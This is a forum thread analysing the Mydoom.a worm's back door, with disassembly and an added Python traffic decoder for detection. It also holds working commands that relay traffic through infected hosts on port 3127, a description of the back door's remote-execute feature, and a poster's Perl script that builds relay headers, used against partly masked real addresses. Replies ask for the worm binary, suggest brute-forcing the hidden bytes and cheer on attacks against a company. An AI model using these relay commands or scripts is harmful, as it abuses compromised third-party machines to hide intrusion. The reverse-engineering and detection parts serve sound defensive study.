ch0pper
The Mydoom.a back door exists as a DLL. By modifying the value of the corresponding registry key, it gets itself loaded into the Explorer process.

Normally the registry entry looks like this:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
<NO NAME> REG_EXPAND_SZ %SystemRoot%\System32\webcheck.dll
ThreadingModel REG_SZ Apartment

Mydoom.a, however, changes %SystemRoot%\System32\webcheck.dll here to its own shimgapi.dll.

By default the shimgapi.dll back door listens on port 3127; if that port is taken, it moves up one port at a time, but not beyond 3198.

This back door provides two functions:
1. acting as a port-forwarding proxy
2. acting as a back door that receives a program and executes it

Related code:
.text:7E1A1C44 sub_7E1A1C44 proc near ; DATA XREF: start+19o
.text:7E1A1C44
.text:7E1A1C44 WSAData = WSAData ptr -190h
.text:7E1A1C44
.text:7E1A1C44 sub esp, 190h
.text:7E1A1C4A push esi
.text:7E1A1C4B push edi
.text:7E1A1C4C call sub_7E1A1A1F
.text:7E1A1C51 lea eax, [esp+198h+WSAData]
.text:7E1A1C55 push eax ; lpWSAData
.text:7E1A1C56 push 2 ; wVersionRequested
.text:7E1A1C58 call ds:WSAStartup
.text:7E1A1C5E call Address
.text:7E1A1C63 mov edi, ds:Sleep
.text:7E1A1C69 mov esi, 0C37h ; listen on port 3127
.text:7E1A1C6E
.text:7E1A1C6E loc_7E1A1C6E: ; CODE XREF: sub_7E1A1C44+50j
.text:7E1A1C6E push 3
.text:7E1A1C70 push esi
.text:7E1A1C71 call sub_7E1A1B52 ; bind subroutine
.text:7E1A1C76 pop ecx
.text:7E1A1C77 pop ecx
.text:7E1A1C78 push 400h ; dwMilliseconds
.text:7E1A1C7D call edi ; Sleep
.text:7E1A1C7F cmp esi, 0C7Eh ; the port must not exceed 3198
.text:7E1A1C85 jle short loc_7E1A1C93
.text:7E1A1C87 push 800h ; dwMilliseconds
.text:7E1A1C8C call edi ; Sleep
.text:7E1A1C8E mov esi, 0C37h
.text:7E1A1C93
.text:7E1A1C93 loc_7E1A1C93: ; CODE XREF: sub_7E1A1C44+41j
.text:7E1A1C93 inc esi ; next port; once past 3198, start again from 3127 and rebind
.text:7E1A1C94 jmp short loc_7E1A1C6E
.text:7E1A1C94 sub_7E1A1C44 endp

After port 3127 accepts a connection, if the first received byte is \x04 the code switches to the port-forwarding flow: it checks whether the second byte is 0x01, takes bytes 3-4 as the target port and bytes 5-8 as the target IP address, connects to that target, and then forwards data over the current socket.

For example, we use \x00\x6e\xc0\xa8\x01\x0b as the forwarding command, where \x00\x6e is port 110 and \xc0\xa8\x01\x0b is 192.168.1.11.

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127
Z.n....+OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.

As you can see, the reply from port 110 on 192.168.1.11 was returned. Note that there is also a short piece of data in front of the returned text. Testing again:

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 69 63 72  .Z.n....+OK Micr
0000010: 6f 73 6f 66 74 20 45 78 63 68 61 6e 67 65 20 53  osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 30 33 20 50 4f 50 33 20  erver 2003 POP3 
0000030: 73 65 72 76 65 72 20 76 65 72 73 69 6f 6e 20 36  server version 6
0000040: 2e 35 2e 36 39 34 34 2e 30 20 72 65 61 64 79 2e  .5.6944.0 ready.

Now an attempt to forward to port 98, which is not open:
# printf "\x04\x01\x00\x62\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5b 00 62 c0 a8 01 0b                          .[.b....

Obviously that piece of data expresses the connection state: 04 5a means the connection succeeded, 04 5b means the connection failed. After it comes the forwarding command that was sent. This feature was probably designed by the worm author so that his own client can easily tell the result.

Related code:
.text:7E1A17F5
.text:7E1A17F5 loc_7E1A17F5: ; CODE XREF: sub_7E1A17BA+2Bj
.text:7E1A17F5 cmp byte ptr [ebp-1], 4 ; is the first byte 0x04?
.text:7E1A17F9 push ebx
.text:7E1A17FA jnz loc_7E1A18B7 ; first byte is not 0x04: go to the exit
.text:7E1A1800 xor ebx, ebx
.text:7E1A1802
.text:7E1A1802 loc_7E1A1802: ; CODE XREF: sub_7E1A17BA+65j
.text:7E1A1802 push 0 ; flags
.text:7E1A1804 push 8
.text:7E1A1806 pop eax
.text:7E1A1807 sub eax, ebx
.text:7E1A1809 push eax ; len
.text:7E1A180A lea eax, [ebp+ebx+buf]
.text:7E1A180E push eax ; buf
.text:7E1A180F push [ebp+s] ; s
.text:7E1A1812 call esi ; recv
.text:7E1A1814 test eax, eax
.text:7E1A1816 jl short loc_7E1A1823
.text:7E1A1818 jz short loc_7E1A1825
.text:7E1A181A add ebx, eax
.text:7E1A181C cmp ebx, 8 ; have fewer than 8 bytes been received so far?
.text:7E1A181F jl short loc_7E1A1802 ; not enough bytes yet: recv again
.text:7E1A1821 jmp short loc_7E1A1825
.text:7E1A1823 ; ---------------------------------------------------------------------------
.text:7E1A1823
.text:7E1A1823 loc_7E1A1823: ; CODE XREF: sub_7E1A17BA+5Cj
.text:7E1A1823 mov ebx, eax
.text:7E1A1825
.text:7E1A1825 loc_7E1A1825: ; CODE XREF: sub_7E1A17BA+5Ej
.text:7E1A1825 ; sub_7E1A17BA+67j
.text:7E1A1825 cmp ebx, 8
.text:7E1A1828 jnz loc_7E1A1907
.text:7E1A182E jmp short loc_7E1A1836
.text:7E1A1830 ; ---------------------------------------------------------------------------
.text:7E1A1830
.text:7E1A1830 loc_7E1A1830: ; CODE XREF: sub_7E1A17BA+8Cj
.text:7E1A1830 cmp [ebp+var_2], 0 ; is the byte after the first 8 bytes 0x00, i.e. were only 8 bytes sent?
.text:7E1A1834 jz short loc_7E1A184A
.text:7E1A1836
.text:7E1A1836 loc_7E1A1836: ; CODE XREF: sub_7E1A17BA+74j
.text:7E1A1836 push 0
.text:7E1A1838 lea eax, [ebp+var_2]
.text:7E1A183B push 1
.text:7E1A183D push eax
.text:7E1A183E push [ebp+s]
.text:7E1A1841 call esi
.text:7E1A1843 cmp eax, 1
.text:7E1A1846 jz short loc_7E1A1830
.text:7E1A1848 jmp short loc_7E1A18B7
.text:7E1A184A ; ---------------------------------------------------------------------------
.text:7E1A184A
.text:7E1A184A loc_7E1A184A: ; CODE XREF: sub_7E1A17BA+7Aj
.text:7E1A184A cmp [ebp+buf], 4 ; check once more that the first byte is 0x04
.text:7E1A184E jnz short loc_7E1A18B7
.text:7E1A1850 cmp byte ptr [ebp-0Fh], 1 ; is the second byte 0x01? if so continue, otherwise exit
.text:7E1A1854 jnz short loc_7E1A18B7
.text:7E1A1856 cmp [ebp+hostlong], 0 ; are the last four bytes (the IP) all zero?
.text:7E1A185A jz short loc_7E1A187C
.text:7E1A185C push [ebp+hostlong] ; hostlong
.text:7E1A185F call ds:htonl
.text:7E1A1865 test eax, 0FFFFFF00h ; check the input IP against the 255.255.255.0 mask
.text:7E1A186A jnz short loc_7E1A187C
.text:7E1A186C push [ebp+s]
.text:7E1A186F lea ebx, [ebp+hostlong]
.text:7E1A1872 call sub_7E1A1664
.text:7E1A1877 test eax, eax
.text:7E1A1879 pop ecx
.text:7E1A187A jnz short loc_7E1A18B7
.text:7E1A187C
.text:7E1A187C loc_7E1A187C: ; CODE XREF: sub_7E1A17BA+A0j
.text:7E1A187C ; sub_7E1A17BA+B0j
.text:7E1A187C mov ax, [ebp-0Eh] ; take the two bytes after 04 01 as the port
.text:7E1A1880 push 6 ; protocol
.text:7E1A1882 mov word ptr [ebp+name.sa_data], ax
.text:7E1A1886 mov eax, [ebp+hostlong]
.text:7E1A1889 push 1 ; type
.text:7E1A188B push 2 ; af
.text:7E1A188D mov [ebp+name.sa_family], 2
.text:7E1A1893 mov dword ptr [ebp+name.sa_data+2], eax
.text:7E1A1896 call ds:socket
.text:7E1A189C cmp eax, 0FFFFFFFFh
.text:7E1A189F mov [ebp+var_8], eax
.text:7E1A18A2 jz short loc_7E1A18B7
.text:7E1A18A4 lea eax, [ebp+name]
.text:7E1A18A7 push 10h ; namelen
.text:7E1A18A9 push eax ; name
.text:7E1A18AA push [ebp+var_8] ; s
.text:7E1A18AD call ds:connect
.text:7E1A18B3 test eax, eax
.text:7E1A18B5 jz short loc_7E1A18D2
.text:7E1A18B7
.text:7E1A18B7 loc_7E1A18B7: ; CODE XREF: sub_7E1A17BA+40j
.text:7E1A18B7 ; sub_7E1A17BA+8Ej...
.text:7E1A18B7 push 0 ; flags
.text:7E1A18B9 lea eax, [ebp+buf]
.text:7E1A18BC push 8 ; len
.text:7E1A18BE push eax ; buf
.text:7E1A18BF push [ebp+s] ; s
.text:7E1A18C2 mov [ebp+buf], 4
.text:7E1A18C6 mov byte ptr [ebp-0Fh], 5Bh ; connection failed: reply with 0x5B
.text:7E1A18CA call ds:send
.text:7E1A18D0 jmp short loc_7E1A18F8
.text:7E1A18D2 ; ---------------------------------------------------------------------------
.text:7E1A18D2
.text:7E1A18D2 loc_7E1A18D2: ; CODE XREF: sub_7E1A17BA+FBj
.text:7E1A18D2 push 0 ; flags
.text:7E1A18D4 lea eax, [ebp+buf]
.text:7E1A18D7 push 8 ; len
.text:7E1A18D9 push eax ; buf
.text:7E1A18DA push [ebp+s] ; s
.text:7E1A18DD mov [ebp+buf], 4
.text:7E1A18E1 mov byte ptr [ebp-0Fh], 5Ah ; connection succeeded: reply with 0x5A
.text:7E1A18E5 call ds:send
.text:7E1A18EB push [ebp+var_8]
.text:7E1A18EE push [ebp+s]
.text:7E1A18F1 call sub_7E1A16D3
.text:7E1A18F6 pop ecx
.text:7E1A18F7 pop ecx


If the first received byte is \xQQ and bytes 2-5 are \xPP\xPP\xPP\xPP, it receives all data starting from the sixth byte, saves it as a file in the temporary folder, runs it with CreateProcess, and deletes the file after the process exits.

In other words, if we prepend the five bytes \xQQ\xPP\xPP\xPP\xPP to any executable and send it as data to port 3127 of a machine infected with the Mydoom.a worm, that file will be executed on the system. I added this magic header to the system calculator program with UltraEdit, sent it over with nc, and it executed successfully.

# xxd -g 1 -l 64 calc.exe
0000000: QQ PP PP PP PP 4d 5a 90 00 03 00 00 00 04 00 00  .. <. MZ.........
0000010: 00 ff ff 00 00 b8 00 00 00 00 00 00 00 00 40 00  ..............@.
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

# nc 192.168.7.33 3127 < calc.exe
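A decoder for the relay protocol laid out in this post, added here as an example; it is not code from the original post or from the worm. It parses the 8-byte relay header (04 01, target port, target IP, optionally followed by the 0x00 the post sends) and the 04 5A / 04 5B status reply, and labels captured TCP payloads to or from the 3127-3198 listener range so they can be flagged in a detection pipeline. The sample flows are constructed from the printf and xxd output above; the function names (classify, scan) and the flow tuple layout are my own assumptions, not anything from the post.

```python
"""Decoder and detector for the Mydoom.a port-forwarding back door protocol.

Added example, not from the original post. Wire format taken from the post:
  request : 04 01 <port:2 bytes big-endian> <ipv4:4 bytes> [00] [data to relay]
  reply   : 04 5A|5B <port> <ipv4> [data returned by the target]
"""
import socket
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

LISTEN_PORT_FIRST = 3127   # 0C37h in the listing
LISTEN_PORT_LAST = 3198    # 0C7Eh in the listing
STATUS_OK = 0x5A           # "Z": connection to the target succeeded
STATUS_FAIL = 0x5B         # "[": connection to the target failed


@dataclass
class RelayRequest:
    target_ip: str
    target_port: int
    terminated: bool       # a 0x00 byte followed the 8-byte header (as in the post's example)
    payload: bytes         # anything after the header, which the back door would relay


@dataclass
class RelayReply:
    success: bool
    target_ip: str
    target_port: int
    relayed: bytes         # data from the target, returned after the echoed header


def is_listener_port(port: int) -> bool:
    """True if port lies in the range the back door binds (3127 up to and including 3198)."""
    return LISTEN_PORT_FIRST <= port <= LISTEN_PORT_LAST


def _unpack_header(data: bytes) -> Tuple[int, str]:
    """Bytes 3-4 carry the target port (network order), bytes 5-8 the IPv4 address."""
    (port,) = struct.unpack("!H", data[2:4])
    return port, socket.inet_ntoa(data[4:8])


def parse_relay_request(data: bytes) -> Optional[RelayRequest]:
    """Decode a client-to-back-door relay request; None if the bytes are not one."""
    if len(data) < 8 or data[0] != 0x04 or data[1] != 0x01:
        return None
    port, ip = _unpack_header(data)
    rest = data[8:]
    terminated = rest.startswith(b"\x00")
    if terminated:
        rest = rest[1:]
    return RelayRequest(ip, port, terminated, rest)


def parse_relay_reply(data: bytes) -> Optional[RelayReply]:
    """Decode the back door's answer: the request header echoed with byte 2 set to 5A or 5B."""
    if len(data) < 8 or data[0] != 0x04 or data[1] not in (STATUS_OK, STATUS_FAIL):
        return None
    port, ip = _unpack_header(data)
    return RelayReply(data[1] == STATUS_OK, ip, port, data[8:])


def classify(dst_port: int, src_port: int, data: bytes) -> Optional[str]:
    """Label one TCP payload; None means it is not Mydoom relay traffic."""
    if is_listener_port(dst_port):
        req = parse_relay_request(data)
        if req:
            return f"mydoom-relay-request -> {req.target_ip}:{req.target_port}"
    if is_listener_port(src_port):
        rep = parse_relay_reply(data)
        if rep:
            state = "open" if rep.success else "failed"
            return f"mydoom-relay-reply {state} {rep.target_ip}:{rep.target_port}"
    return None


# Constructed sample flows (src_port, dst_port, payload) mirroring the post's two tests
# plus one unrelated payload that must not match.
SAMPLE_FLOWS = [
    (40001, 3127, bytes.fromhex("0401006ec0a8010b00")),
    (3127, 40001, bytes.fromhex("045a006ec0a8010b") + b"+OK Microsoft Exchange Server"),
    (40002, 3127, bytes.fromhex("04010062c0a8010b00")),
    (3127, 40002, bytes.fromhex("045b0062c0a8010b")),
    (40003, 3127, b"GET / HTTP/1.0\r\n\r\n"),
]


def scan(flows) -> List[str]:
    """Run classify over (src_port, dst_port, payload) tuples and keep the hits."""
    return [label for (sp, dp, data) in flows if (label := classify(dp, sp, data))]


if __name__ == "__main__":
    for line in scan(SAMPLE_FLOWS):
        print(line)
```

The request check deliberately keys on both the listener port range and the 04 01 prefix, because the port alone is a weak indicator (3127 is not reserved) and the prefix alone matches other binary protocols; a reply is only accepted from a source port in the same range, so the status byte and the echoed target give an analyst the same "open/failed" verdict the post derives from the raw xxd output.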
easternerd
thanks for this..
i was looking for the exe..
never came across one..
please do pm me if you can send it across...
i want to dissect it myself...
FireAlwaysWorks
Nice, why would you want an exe? Ooah yeah, because you're too pathetic to forge a simple udp datagram

Anyway, good work, I was curious when someone would figure out the back-door properties of mydoom.a. Too bad there are better ways of hacking people. MyDoom.a is very intelligent. I am shocked it didn't have a better payload, or at least protect itself better. I still want to see microsoft.com go down. I bet they are paying a $hit load for bandwidth though.

peace
clip
CODE

#!/usr/bin/perl
# usage: ./yourdoom.pl <target-ip> <target-port>
# prints the 8-byte relay header (04 01 port ip) followed by the 0x00 terminator

$ip = shift;
$port = shift;
$p1 = int($port / 256);   # high byte of the port
$p2 = $port % 256;        # low byte of the port
if ( $ip =~ /(\d+)\.(\d+)\.(\d+)\.(\d+)/ ) {
    printf("\x04\x01%c%c%c%c%c%c\x00", $p1, $p2, $1, $2, $3, $4);
}


CODE

$ ./yourdoom.pl *.125.204.* 21|nc *.15.138.* 3127 | xxd -g 1
0000000: 04 5a 00 15 d4 7d cc 8c 32 32 30 20 53 65 72 76  .Z...}..220 Serv
0000010: 2d 55 20 46 54 50 2d 53 65 72 76 65 72 20 76 32  -U FTP-Server v2
0000020: 2e 35 64 20 66 6f 72 20 57 69 6e 53 6f 63 6b 20  .5d for WinSock


Very nice information.

Anyone got the virus? i want to infect my VM.

alright.. the QQ and PP are variables; the author doesn't want to expose them because of the possible impact. We could just brute force it.
dissolutions
great post, but how about we not put it in the proxy section?
moved
mkwento
great work !!!

thks.
Yorn
QUOTE (clip @ Feb 6 2004, 03:31 PM)
CODE

$ ./yourdoom.pl *.125.204.* 21|nc *.15.138.* 3127 | xxd -g 1

I'm not sure I'm following this correctly.
Diawollo
nice
_Daniel_
very nice

Mfg